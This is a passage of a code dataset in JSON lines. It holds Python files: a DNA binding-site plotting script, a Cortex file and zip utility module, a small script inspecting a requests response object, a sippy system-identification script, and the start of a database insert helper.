iMADS(models, imads_cutoff) # 0.2128 is for the ETS1 cutoff\n\n escore = PBMEscore(escore_short_path, escore_map_path)\n\n sitelist_path = \"%s/%s\" % (analysis_result_path, \"sitefiles_list.txt\")\n with open(sitelist_path, 'r') as f:\n sitelist = [line.strip() for line in f.readlines()]\n for sitefile in sitelist:\n filename = os.path.basename(os.path.splitext(sitefile)[0])\n print(\"Making sites plot for %s\" % filename)\n seqdf = pd.read_csv(sitefile, sep='\\t')\n\n # Make Escore object\n es_preds = escore.predict_sequences(seqdf)\n eplots = escore.plot(es_preds)\n # Make iMADS plot\n imads_preds = imads.predict_sequences(seqdf)\n imadsplots = imads.plot(imads_preds)\n plots = [imadsplots, eplots]\n\n pc = PlotCombiner() # can do this just once but not a big deal\n plotpath = \"%s/sitesplot_%s.pdf\" % (analysis_result_path, filename)\n pc.plot_seq_combine(plots, filepath=plotpath)\n\n filtered_sites = {}\n print(\"Site filtering...\")\n for key in es_preds:\n es_pred1 = es_preds[key]\n imads_pred1 = imads_preds[key]\n bs = BindingSites(imads_pred1,es_pred1)\n if bs.site_count() == 2:\n filtered_sites[key] = bs\n site_list = [{**{\"key\":site, \"sequence\":es_preds[site].sequence},**filtered_sites[site].get_sites_dict()} for site in filtered_sites]\n columns = [\"key\", \"site_start_1\", \"site_start_2\", \"site_end_1\", \"site_end_2\", \"site_pos_1\", \"site_pos_2\", \"imads_score_1\", \"imads_score_2\", \"sequence\"]\n pd.DataFrame(site_list).to_csv(dfpath, index=False, columns=columns, float_format='%.4f')\n\n print(\"Done\")\n'''", "sub_path": "src/chip2probe.py", "file_name": "chip2probe.py", "file_ext": "py", "file_size_in_byte": 13502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 56, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 66, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 68, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 73, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 93, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 103, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 119, "usage_type": "call"}, 
{"api_name": "datetime.datetime", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 164, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 188, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 241, "usage_type": "call"}]} +{"seq_id": "387581814", "text": "# Copyright 2020 Cortex Labs, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport errno\nimport shutil\nimport stat\nimport pickle\nimport json\nimport collections\nimport tempfile\nimport zipfile\nimport hashlib\nimport msgpack\nimport pathlib\nimport inspect\nfrom inspect import Parameter\n\nfrom copy import deepcopy\nfrom datetime import datetime\n\nfrom cortex.lib import stringify\nimport json_tricks\n\n\ndef isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n\ndef json_tricks_encoder(*args, **kwargs):\n kwargs[\"primitives\"] = True\n kwargs[\"obj_encoders\"] = json_tricks.nonp.DEFAULT_ENCODERS\n params = list(inspect.signature(json_tricks.TricksEncoder).parameters.values())\n params += list(inspect.signature(json.JSONEncoder).parameters.values())\n expected_keys = set()\n for param in params:\n if param.kind == Parameter.POSITIONAL_OR_KEYWORD or param.kind == Parameter.KEYWORD_ONLY:\n expected_keys.add(param.name)\n\n for key in list(kwargs.keys()):\n if key not in expected_keys:\n kwargs.pop(key)\n\n return json_tricks.TricksEncoder(*args, **kwargs)\n\n\ndef pluralize(num, singular, plural):\n if num == 1:\n return str(num) + \" \" + singular\n else:\n return str(num) + \" \" + plural\n\n\ndef snake_to_camel(input, sep=\"_\", lower=True):\n output = \"\"\n for idx, word in enumerate(input.lower().split(sep)):\n if idx == 0 and lower:\n output += word\n else:\n output += word[0].upper() + word[1:]\n return output\n\n\ndef mkdir_p(dir_path):\n pathlib.Path(dir_path).mkdir(parents=True, exist_ok=True)\n\n\ndef rm_dir(dir_path):\n if os.path.isdir(dir_path):\n shutil.rmtree(dir_path)\n return True\n return False\n\n\ndef rm_file(path):\n if os.path.isfile(path):\n os.remove(path)\n return True\n return False\n\n\ndef list_files_recursive(dir_path, ignore=None):\n all_file_names = []\n for root, _, file_names in os.walk(dir_path):\n if ignore:\n file_names = set(file_names) - ignore(root, file_names)\n for file_name in file_names:\n all_file_names.append(os.path.join(root, file_name))\n return all_file_names\n\n\n# https://stackoverflow.com/questions/1868714/how-do-i-copy-an-entire-directory-of-files-into-an-existing-directory-using-pyth\ndef cp_dir(src, dst, symlinks=False, ignore=None):\n if 
not os.path.exists(dst):\n os.makedirs(dst)\n shutil.copystat(src, dst)\n lst = os.listdir(src)\n if ignore:\n excl = ignore(src, lst)\n lst = [x for x in lst if x not in excl]\n for item in lst:\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if symlinks and os.path.islink(s):\n if os.path.lexists(d):\n os.remove(d)\n os.symlink(os.readlink(s), d)\n try:\n st = os.lstat(s)\n mode = stat.S_IMODE(st.st_mode)\n os.lchmod(d, mode)\n except:\n pass # lchmod not available\n elif os.path.isdir(s):\n cp_dir(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ntemp_files_ignore = shutil.ignore_patterns(\"*.pyc\", \".*\")\n\n\ndef non_code_ignore(path, names):\n good_patterns = [\"*.py\", \"*.yaml\", \"*.yml\"]\n good_names = []\n for pattern in good_patterns:\n good_names.extend(fnmatch.filter(names, pattern))\n dirs = [f for f in names if os.path.isdir(os.path.join(path, f))]\n return set(names) - set(good_names) - set(dirs)\n\n\ndef make_temp_dir(parent_dir=None, prefix=\"tmp-\", suffix=\"\"):\n return tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=parent_dir)\n\n\nclass Tempdir:\n def __init__(self, parent_dir=None, prefix=\"tmp-\", suffix=\"\"):\n self.parent_dir = parent_dir\n self.prefix = prefix\n self.suffix = suffix\n\n def __enter__(self):\n self.temp_dir = make_temp_dir(self.parent_dir, self.prefix, self.suffix)\n return self.temp_dir\n\n def __exit__(self, type, value, traceback):\n rm_dir(self.temp_dir)\n\n\ndef now_timestamp_rfc_3339():\n return datetime.utcnow().isoformat(\"T\") + \"Z\"\n\n\ndef trim_prefix(string, prefix):\n if string.startswith(prefix):\n return string[len(prefix) :]\n return string\n\n\ndef ensure_prefix(string, prefix):\n if string.startswith(prefix):\n return string\n return prefix + string\n\n\ndef trim_suffix(string, suffix):\n if string.endswith(suffix):\n return string[: -len(suffix)]\n return string\n\n\ndef ensure_suffix(string, suffix):\n if string.endswith(suffix):\n return string\n return string + suffix\n\n\ndef is_bool(var):\n return isinstance(var, bool)\n\n\ndef is_float(var):\n return isinstance(var, float)\n\n\ndef is_int(var):\n return isinstance(var, int) and not isinstance(var, bool)\n\n\ndef is_str(var):\n return isinstance(var, str)\n\n\ndef is_dict(var):\n return isinstance(var, dict)\n\n\ndef is_list(var):\n return isinstance(var, list)\n\n\ndef is_tuple(var):\n return isinstance(var, tuple)\n\n\ndef is_float_or_int(var):\n return is_int(var) or is_float(var)\n\n\ndef is_int_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_int(item):\n return False\n return True\n\n\ndef is_float_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_float(item):\n return False\n return True\n\n\ndef is_str_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_str(item):\n return False\n return True\n\n\ndef is_bool_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_bool(item):\n return False\n return True\n\n\ndef is_float_or_int_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_float_or_int(item):\n return False\n return True\n\n\n# Note: this converts tuples to lists\ndef flatten(var):\n if is_list(var) or is_tuple(var):\n return [a for i in var for a in flatten(i)]\n else:\n return [var]\n\n\ndef create_multi_map(d, key_func):\n \"\"\"Create a dictionary that returns a list of values for a specific key.\n\n Args:\n d (dict): The dictionary to convert to multimap.\n key_func (callable): A 
callable that gets called with the key and value to create a new ID.\n\n Returns:\n type: A dict of lists.\n\n \"\"\"\n new_dict = {}\n for k, v in d.items():\n new_key = key_func(k, v)\n ls = new_dict.get(new_key, [])\n ls.append(v)\n new_dict[new_key] = ls\n return new_dict\n\n\ndef merge_dicts_in_place_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, with overwriting. First dict is updated in place\"\"\"\n dicts = list(dicts)\n target = dicts.pop(0)\n for d in dicts:\n merge_two_dicts_in_place_overwrite(target, d)\n return target\n\n\ndef merge_dicts_in_place_no_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, without overwriting. First dict is updated in place\"\"\"\n dicts = list(dicts)\n target = dicts.pop(0)\n for d in dicts:\n merge_two_dicts_in_place_no_overwrite(target, d)\n return target\n\n\ndef merge_dicts_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, with overwriting. A new dict is created, original ones not modified.\"\"\"\n result = {}\n for d in dicts:\n result = merge_two_dicts_overwrite(result, d)\n return result\n\n\ndef merge_dicts_no_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, without overwriting. A new dict is created, original ones not modified.\"\"\"\n result = {}\n for d in dicts:\n result = merge_two_dicts_no_overwrite(result, d)\n return result\n\n\ndef merge_two_dicts_in_place_overwrite(x, y):\n \"\"\"Merge y into x, with overwriting. x is updated in place\"\"\"\n if x is None:\n x = {}\n\n if y is None:\n y = {}\n\n for k, v in y.items():\n if k in x and isinstance(x[k], dict) and isinstance(y[k], collections.Mapping):\n merge_dicts_in_place_overwrite(x[k], y[k])\n else:\n x[k] = y[k]\n return x\n\n\ndef merge_two_dicts_in_place_no_overwrite(x, y):\n \"\"\"Merge y into x, without overwriting. x is updated in place\"\"\"\n for k, v in y.items():\n if k in x and isinstance(x[k], dict) and isinstance(y[k], collections.Mapping):\n merge_dicts_in_place_no_overwrite(x[k], y[k])\n else:\n if k not in x:\n x[k] = y[k]\n return x\n\n\ndef merge_two_dicts_overwrite(x, y):\n \"\"\"Merge y into x, with overwriting. A new dict is created, original ones not modified.\"\"\"\n x = deepcopy(x)\n return merge_dicts_in_place_overwrite(x, y)\n\n\ndef merge_two_dicts_no_overwrite(x, y):\n \"\"\"Merge y into x, without overwriting. 
A new dict is created, original ones not modified.\"\"\"\n y = deepcopy(y)\n return merge_dicts_in_place_overwrite(y, x)\n\n\ndef normalize_path(path, rel_dir):\n if os.path.isabs(path):\n return path\n else:\n return os.path.normpath(os.path.join(rel_dir, path))\n\n\ndef read_file(path):\n if not os.path.isfile(path):\n return None\n with open(path, \"r\") as file:\n return file.read()\n\n\ndef read_file_strip(path):\n contents = read_file(path)\n if is_str(contents):\n contents = contents.strip()\n return contents\n\n\ndef get_json(json_path):\n with open(json_path, \"r\") as json_file:\n return json.load(json_file)\n\n\ndef read_msgpack(msgpack_path):\n with open(msgpack_path, \"rb\") as msgpack_file:\n return msgpack.load(msgpack_file, raw=False)\n\n\ndef zip_dir(src_dir, dest_path, nest_dir=False, ignore=None):\n \"\"\"Note: files are added at the root level of the zip, unless nest_dir=True\"\"\"\n if nest_dir:\n root = os.path.basename(src_dir)\n else:\n root = \"\"\n\n return zip_dispersed_files(src_files=[(src_dir, root)], dest_path=dest_path, ignore=ignore)\n\n\ndef zip_files(\n src_files,\n dest_path,\n flatten=False,\n remove_common_prefix=False,\n remove_prefix=\"\",\n add_prefix=\"\",\n empty_files=[],\n ignore=None,\n allow_missing_files=False,\n):\n \"\"\"src_files is a list of strings (path_to_file/dir)\"\"\"\n dest_path = ensure_suffix(dest_path, \".zip\")\n add_prefix = trim_prefix(add_prefix, \"/\")\n\n if remove_prefix != \"\" and not remove_prefix.endswith(\"/\"):\n remove_prefix = remove_prefix + \"/\"\n\n common_prefix = \"\"\n if remove_common_prefix:\n common_prefix = os.path.commonprefix(src_files)\n\n src_dirs = [f for f in src_files if f and os.path.isdir(f)]\n src_files = [f for f in src_files if f and os.path.isfile(f)]\n for src_dir in src_dirs:\n src_files += list_files_recursive(src_dir, ignore=ignore)\n\n with zipfile.ZipFile(dest_path, \"w\", zipfile.ZIP_DEFLATED) as myzip:\n for empty_file_path in empty_files:\n empty_file_path = trim_prefix(empty_file_path, \"/\")\n myzip.writestr(empty_file_path, \"\")\n\n for src_file in src_files:\n if flatten:\n zip_name = os.path.basename(src_file)\n else:\n zip_name = src_file\n zip_name = trim_prefix(zip_name, remove_prefix)\n zip_name = trim_prefix(zip_name, common_prefix)\n\n zip_name = os.path.join(add_prefix, zip_name)\n if allow_missing_files:\n if os.path.isfile(src_file):\n myzip.write(src_file, arcname=zip_name)\n else:\n myzip.write(src_file, arcname=zip_name)\n\n\ndef zip_dispersed_files(\n src_files, dest_path, add_prefix=\"\", empty_files=[], ignore=None, allow_missing_files=False\n):\n \"\"\"src_files is a list of tuples (path_to_file/dir, path_in_zip)\"\"\"\n dest_path = ensure_suffix(dest_path, \".zip\")\n add_prefix = trim_prefix(add_prefix, \"/\")\n\n src_dirs = [(f, p) for f, p in src_files if f and os.path.isdir(f)]\n src_files = [(f, p) for f, p in src_files if f and os.path.isfile(f)]\n for src_dir, zip_name in src_dirs:\n for src_file in list_files_recursive(src_dir, ignore=ignore):\n common_prefix = os.path.commonprefix([src_dir, src_file])\n rel_src_file = trim_prefix(src_file, common_prefix)\n rel_src_file = trim_prefix(rel_src_file, \"/\")\n updated_zip_name = os.path.join(zip_name, rel_src_file)\n src_files.append((src_file, updated_zip_name))\n\n with zipfile.ZipFile(dest_path, \"w\", zipfile.ZIP_DEFLATED) as myzip:\n for empty_file_path in empty_files:\n empty_file_path = trim_prefix(empty_file_path, \"/\")\n myzip.writestr(empty_file_path, \"\")\n\n for src_file, zip_name in 
src_files:\n zip_name = trim_prefix(zip_name, \"/\")\n zip_name = os.path.join(add_prefix, zip_name)\n if allow_missing_files:\n if os.path.isfile(src_file):\n myzip.write(src_file, arcname=zip_name)\n else:\n myzip.write(src_file, arcname=zip_name)\n\n\ndef extract_zip(zip_path, dest_dir=None, delete_zip_file=False):\n if dest_dir is None:\n dest_dir = os.path.dirname(zip_path)\n\n zip_ref = zipfile.ZipFile(zip_path, \"r\")\n zip_ref.extractall(dest_dir)\n zip_ref.close()\n\n if delete_zip_file:\n rm_file(zip_path)\n\n\ndef max_len(strings):\n return max(len(s) for s in strings)\n\n\ndef pad_smart(string, width, is_number):\n if is_number:\n return pad_left(string, width)\n else:\n return pad_right(string, width)\n\n\ndef pad_right(string, width):\n return string.ljust(width)\n\n\ndef pad_left(string, width):\n return string.rjust(width)\n\n\ndef is_number_col(items):\n if all(item is None for item in items):\n return False\n\n for item in items:\n if not is_int(item) and not is_float(item) and item != None:\n return False\n\n return True\n\n\ndef has_function(impl, fn_name):\n fn = getattr(impl, fn_name, None)\n if fn is None:\n return False\n\n return callable(fn)\n", "sub_path": "pkg/workloads/cortex/lib/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 14520, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json_tricks.nonp", "line_number": 43, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 44, "usage_type": "call"}, {"api_name": "json_tricks.TricksEncoder", "line_number": 44, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 45, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 45, "usage_type": "attribute"}, {"api_name": "inspect.Parameter.POSITIONAL_OR_KEYWORD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "inspect.Parameter", "line_number": 48, "usage_type": "name"}, {"api_name": "inspect.Parameter.KEYWORD_ONLY", "line_number": 48, "usage_type": "attribute"}, {"api_name": "json_tricks.TricksEncoder", "line_number": 55, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 88, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 106, "usage_type": "call"}, {"api_name": "shutil.copystat", "line_number": 107, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": 
"os.path.islink", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.lexists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 117, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 118, "usage_type": "call"}, {"api_name": "os.readlink", "line_number": 118, "usage_type": "call"}, {"api_name": "os.lstat", "line_number": 120, "usage_type": "call"}, {"api_name": "stat.S_IMODE", "line_number": 121, "usage_type": "call"}, {"api_name": "os.lchmod", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 128, "usage_type": "call"}, {"api_name": "shutil.ignore_patterns", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 162, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 337, "usage_type": "attribute"}, {"api_name": "collections.Mapping", "line_number": 347, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 357, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path", "line_number": 371, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 390, "usage_type": "call"}, {"api_name": "msgpack.load", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path", "line_number": 401, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 428, "usage_type": "call"}, {"api_name": "os.path", "line_number": 428, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 430, "usage_type": "call"}, {"api_name": "os.path", "line_number": 430, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path", "line_number": 431, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 435, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 435, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path", "line_number": 448, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 450, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path", "line_number": 464, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 473, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 473, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path", "line_number": 490, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 492, "usage_type": "call"}]} +{"seq_id": "10574934", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 30 23:44:53 2019\n\n@author: root\n\"\"\"\n\nimport requests\n\nurl='https://docs.python.org/3/library/functions.html' # ----------< INPUT >\n\nr = requests.get(url) # use try catch # MY RESEARCH : \"OBJECT\" r\n\n## -----ANALYSE request object 'r' \nalldirs = dir(r) #list\nallvars = vars(r) #dictionary\n#. type\n#. id\n#. \n\n\"\"\"\ntype() :type of object\ndir() :set of attributes\nid()\ngetattr()\nhasattr()\nglobals()\nlocals()\ncallable()\n\"\"\"\n\n\n# -----< alldirs >---creating command strings (to read objects of [alldirs]\ncommand = list()\nfor i in range(0,len(alldirs)):\n command.append('r.' + str(alldirs[i]))\n\n#### -- HOW DO I RANDOMLY EXECUTE A COMMAND FROM THE ENTIRE LIST???\n# >>>>>> ACCESSING OBJECT 'r' with r.--\n #input('ACommandPress key for next..')\n print(eval(command[i]))\n input('->')\n \n # OR\n# ---------------< RUN till here to test >---- \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n \n \n \n\"\"\" \n## Modify try ----< OOP > --- Do I need it ???? 
\n#--------< first look into the obhect >\nclass Obj1stLook():\n \n def __init__(self,obj):\n self.obj = obj\n print(\"Object type:\\n\", type(self.obj))\n \n # ------------< if a \"requests object\" >-\n\n def lookin(self):\n #return \"Object type:\\n{} \\n\\n Object content:\\n{} \\n\\n Object id: \\n{}\".format(type(self.obj), dir(self.obj), id(self.obj))\n print(dir(self.obj))\n #print(id(self.obj)\n #self.getattr =getattr(self.obj)\n #self.hasattr =hasattr(self.obj)\n #self.globals =globals(self.obj)\n #self.locals =locals(self.obj)\n #self.callable =callable(self.obj)\n\n #def createCommand(self):#self.dir):\n # print(self.dir)\n \nx = Obj1stLook(r)\n\"\"\"\n\n##--------- other paradigm\ndef lookin(obj):\n return \"Object type: {} |||| Object content: {} |||| Object id: {}\" \\\n .format(type(obj), dir(obj), id(obj))\n #print(dir(self.obj))\n #print(id(self.obj)\n #self.getattr =getattr(self.obj)\n #self.hasattr =hasattr(self.obj)\n #self.globals =globals(self.obj)\n #self.locals =locals(self.obj)\n #self.callable =callable(self.obj)", "sub_path": "_requestsWWW.ai.dev/10413www/_webpageanatomy.py", "file_name": "_webpageanatomy.py", "file_ext": "py", "file_size_in_byte": 2425, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "237263580", "text": "\nimport numpy as np\nimport pandas as pd\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nfrom sippy import *\nimport plots\n# %\n#load spteptest data from a TSV file\nfile = r'data\\PC_Data_shifted.csv'\nstep_test_data = pd.read_csv(file,index_col='Time', parse_dates=True, skiprows=[1,2])\n#slice data for model identification case\nstart = '09/30/2012 09:00:00'\nstop = '09/30/2012 12:20:10'\nidinput = step_test_data.loc[start:stop].copy()\n\n#select Inputs and Outputs for the model identification case\ninputs = ['Fuel','Fan', 'Feed']\noutputs = ['Temp', 'O2']\n\n# Create FIR filter to detrend signal \n\nts = pd.Timedelta(step_test_data.index[1] - step_test_data.index[0]).total_seconds() # data sampling time\ntss = 3\ntss_sec = tss * 60\nmult_factor = 3\nfilt_tss = tss_sec * mult_factor\ncutoff = 1/2/filt_tss\npass_zero= 'lowpass'\nnyq_rate = ts/2.0\nwidth = 0.5/nyq_rate\nripple_db =65\nN,beta =signal.kaiserord(ripple_db,width)\nwindow = ('kaiser',beta)\ncoef = signal.firwin(numtaps=N, cutoff=cutoff, window=window, pass_zero=pass_zero, nyq = nyq_rate)\n# plots.plot_freuency_response(coef)\ntrend = signal.filtfilt(coef, 1.0,idinput, axis=0)\nidinput = idinput - trend\n\nu = idinput[inputs].to_numpy().T\ny = idinput[outputs].to_numpy().T\nprint('Output shape:', y.shape)\nprint('Input shape:',u.shape)\n \n#specify model identification parameters, reffer the documentation for detais.\nmodel = 'Precalciner.npz' #model file name\nmethod='CVA'\nIC = 'AIC' # None, AIC, AICc, BIC\nTH = 30 # The length of time horizon used for regression\nfix_ordr = 35 # Used if and only if IC = 'None'\nmax_order = 25 # Used if IC = AIC, AICc or BIC\nreq_D = False\nforce_A_stable = False\n\nsys_id = system_identification(\n y, \n u, \n method,\n SS_fixed_order=fix_ordr,\n SS_max_order=max_order,\n IC=IC,\n SS_f=TH,\n SS_p=TH,\n SS_D_required=req_D,\n SS_A_stability=force_A_stable\n )\n\n#print model order\n# print('Model order:', sys_id.n)\n\n#save model parameters A, B, C,D and X0 as npz file\nnp.savez(model, A=sys_id.A, B=sys_id.B, C=sys_id.C, D=sys_id.D, K=sys_id.K, X0=sys_id.x0)\nplots.plot_model(model, inputs, 
outputs, tss_sec, ts)\n\nstart_time = start\nend_time = stop\npad_len = 30 #int(tss_sec/ts*0.8)\nplots.plot_comparison(step_test_data, model, pad_len, inputs, outputs, start_time, end_time, plt_input=False)", "sub_path": "scripts/demo_PC.py", "file_name": "demo_PC.py", "file_ext": "py", "file_size_in_byte": 2299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.signal.kaiserord", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 33, "usage_type": "name"}, {"api_name": "scipy.signal.firwin", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 35, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.savez", "line_number": 72, "usage_type": "call"}, {"api_name": "plots.plot_model", "line_number": 73, "usage_type": "call"}, {"api_name": "plots.plot_comparison", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "332746557", "text": "from DBSelectQueries import DBSelectQueries as DBSel\r\nfrom FileUtils import get_file_names_from_folder, read_json_file\r\nimport re\r\nimport logging\r\n\r\n\r\nclass DBItemAdder:\r\n\r\n @staticmethod\r\n def sql_insert_used_photos(connection, photo_id):\r\n table_name = \"used_photos\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO 